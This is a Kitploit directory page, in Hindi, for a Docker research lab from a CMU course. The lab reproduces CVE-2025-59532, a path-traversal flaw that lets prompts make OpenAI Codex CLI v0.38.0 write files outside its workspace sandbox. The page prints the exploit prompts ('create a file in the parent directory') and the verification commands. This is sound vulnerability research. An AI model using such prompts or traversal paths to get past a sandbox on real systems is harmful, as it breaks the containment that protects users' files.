Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-59532-poc — सीवीई-2025-59532 का विश्लेषण करने के लिए एक डॉकर-आधारित शोध वातावरण, जो OpenAI Codex CLI में एक पाथ ट्रैवर्सल भेद्यता है, जो इच्छित वर्कस्पेस सैंडबॉक्स के बाहर मनमानी फ़ाइल लेखन की अनुमति देती है। सीएमयू पाठ्यक्रम का हिस्सा: 18-739 Hacking & Offensive Security, पतझड़ 2025 | Kitploit
उपकरण/GitHubGitHub/baktistr/cve-2025-59532-poc
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubbaktistr/cve-2025-59532-poc

cve-2025-59532-poc

सीवीई-2025-59532 का विश्लेषण करने के लिए एक डॉकर-आधारित शोध वातावरण, जो OpenAI Codex CLI में एक पाथ ट्रैवर्सल भेद्यता है, जो इच्छित वर्कस्पेस सैंडबॉक्स के बाहर मनमानी फ़ाइल लेखन की अनुमति देती है। सीएमयू पाठ्यक्रम का हिस्सा: 18-739 Hacking & Offensive Security, पतझड़ 2025

17 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2025-59532 डॉकर वातावरण

CVE-2025-59532 का विश्लेषण करने के लिए एक डॉकर-आधारित शोध वातावरण, जो OpenAI Codex CLI में एक पाथ ट्रैवर्सल भेद्यता है जो इच्छित वर्कस्पेस सैंडबॉक्स के बाहर मनमानी फ़ाइल लेखन की अनुमति देती है। पतन 2025 में CMU पाठ्यक्रम : 18-739 हैकिंग और आक्रामक सुरक्षा का हिस्सा

आरंभ करना

रिपॉजिटरी क्लोन करें

सबसे पहले, इस रिपॉजिटरी को क्लोन करें:

root@kitploit:~
git clone https://github.com/jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

या यदि SSH उपयोग कर रहे हैं:

root@kitploit:~
git clone [email protected]:jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

सीवीई विवरण

CVE-2025-59532 OpenAI के Codex CLI टूल में एक पाथ ट्रैवर्सल भेद्यता है जो हमलावरों को इच्छित वर्कस्पेस निर्देशिका के बाहर फ़ाइलें लिखने की अनुमति देती है, जिससे सैंडबॉक्स प्रतिबंधों को दरकिनार किया जा सकता है।

भेद्यता विवरण

  • सीवीई आईडी: CVE-2025-59532
  • प्रभावित संस्करण: Codex CLI v0.38.0 और पहले
  • भेद्यता प्रकार: मनमाना फ़ाइल लेखन / पाथ ट्रैवर्सल
  • गंभीरता: उच्च
  • हमला वेक्टर: एक हमलावर ऐसे प्रॉम्प्ट तैयार कर सकता है जो Codex को पैरेंट निर्देशिकाओं (जैसे, ../exploit.txt) में फ़ाइलें लिखने के लिए प्रेरित करते हैं, जिससे वर्कस्पेस सैंडबॉक्स से बचकर बाहर निकला जा सकता है, भले ही --sandbox workspace-write सक्षम हो।
  • प्रभाव: सिस्टम निर्देशिकाओं में अनधिकृत फ़ाइल निर्माण, विशेषाधिकार वृद्धि की संभावना, और कंटेनर सुरक्षा सीमाओं से समझौता।
  • पैच: बेहतर पाथ सत्यापन और सैनिटाइज़ेशन के साथ v0.39.0 में ठीक किया गया

यह कैसे काम करता है

यह भेद्यता वर्कस्पेस सैंडबॉक्स कार्यान्वयन में अपर्याप्त पाथ सत्यापन का फायदा उठाती है। जब workspace-write सैंडबॉक्स मोड सक्षम होता है, तो Codex को फ़ाइल संचालन को निर्दिष्ट वर्कस्पेस निर्देशिका तक सीमित करना चाहिए। हालाँकि, v0.38.0 में, पाथ सत्यापन सापेक्ष पाथ ट्रैवर्सल अनुक्रमों (../) को ठीक से संभालने में विफल रहता है, जिससे हमलावर AI को पैरेंट निर्देशिका संदर्भों का उपयोग करने का निर्देश देकर सैंडबॉक्स के बाहर फ़ाइलें लिख सकता है।

पूर्वापेक्षाएँ

  • आपके सिस्टम पर Docker स्थापित हो
  • OpenAI API कुंजी (https://platform.openai.com/api-keys से प्राप्त करें)
  • Docker और कमांड-लाइन संचालन की बुनियादी समझ
  • Git (रिपॉजिटरी क्लोन करने के लिए)

निर्माण और चलाना

Docker इमेज बनाएँ:

root@kitploit:~
docker build -t cve-2025-59532:latest .

कंटेनर चलाएँ:

root@kitploit:~
docker run -it --rm cve-2025-59532:latest

उपयोग

इस Docker वातावरण में Codex CLI के तीन संस्करण शामिल हैं:

  • codex38 - v0.38.0 (असुरक्षित संस्करण)
  • codex39 - v0.39.0 (पैच किया गया संस्करण)
  • codex50 - v0.50.0 (नवीनतम संस्करण)

OpenAI API कुंजी कॉन्फ़िगर करें

एक बार कंटेनर के अंदर, बस codex को इंटरैक्टिव मोड में चलाकर और वहाँ API कुंजी पेस्ट करके अपनी OpenAI API कुंजी कॉन्फ़िगर करें:

root@kitploit:~
codex

API कुंजी ~/.config/codex/auth.json में संग्रहीत होगी और सभी Codex संस्करणों (codex38, codex39, codex50) द्वारा उपयोग की जाएगी।

संस्करण जांचें

root@kitploit:~
codex38 --version  # Should show v0.38.0 (vulnerable)
codex39 --version  # Should show v0.39.0 (patched)
codex50 --version  # Should show v0.50.0 (latest)

भेद्यता का परीक्षण

नोट: वर्कस्पेस /workspace/child पर स्थित है। यह भेद्यता /workspace (पैरेंट निर्देशिका) में लिखने की अनुमति देती है।

असुरक्षित संस्करण का परीक्षण करें (v0.38.0):

root@kitploit:~
codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof1.txt' in the parent directory with content 'CVE-2025-59532 POC'"

पैच किए गए संस्करण का परीक्षण करें (v0.39.0):

root@kitploit:~
codex39 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof2.txt' in the parent directory with content 'CVE-2025-59532 POC'"

नवीनतम संस्करण का परीक्षण करें (v0.50.0):

root@kitploit:~
codex50 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof3.txt' in the parent directory with content 'CVE-2025-59532 POC'"

एक्सप्लॉइट सत्यापित करें:

root@kitploit:~
# Check if files were created outside the sandbox (in /workspace, not /workspace/child)
ls -la /workspace/
cat /workspace/exploit_proof1.txt  # Should exist if v0.38.0 is vulnerable
cat /workspace/exploit_proof2.txt  # Should NOT exist if v0.39.0 is patched
cat /workspace/exploit_proof3.txt  # Should NOT exist if v0.50.0 is secure

# Check current workspace (should be empty or contain only test files)
pwd  # Should show /workspace/child
ls -la /workspace/child/

लॉग जांचें

Codex निष्पादन के विस्तृत डीबग लॉग देखने के लिए:

root@kitploit:~
RUST_LOG=debug codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof.txt' in the parent directory with content 'CVE-2025-59532 POC'"

डीबग लॉग निम्न दिखाएंगे:

  • API अनुरोध और प्रतिक्रियाएँ
  • पाथ सत्यापन प्रयास
  • फ़ाइल संचालन विवरण
  • सैंडबॉक्स प्रवर्तन (या बाईपास) व्यवहार
टूल डाउनलोड करें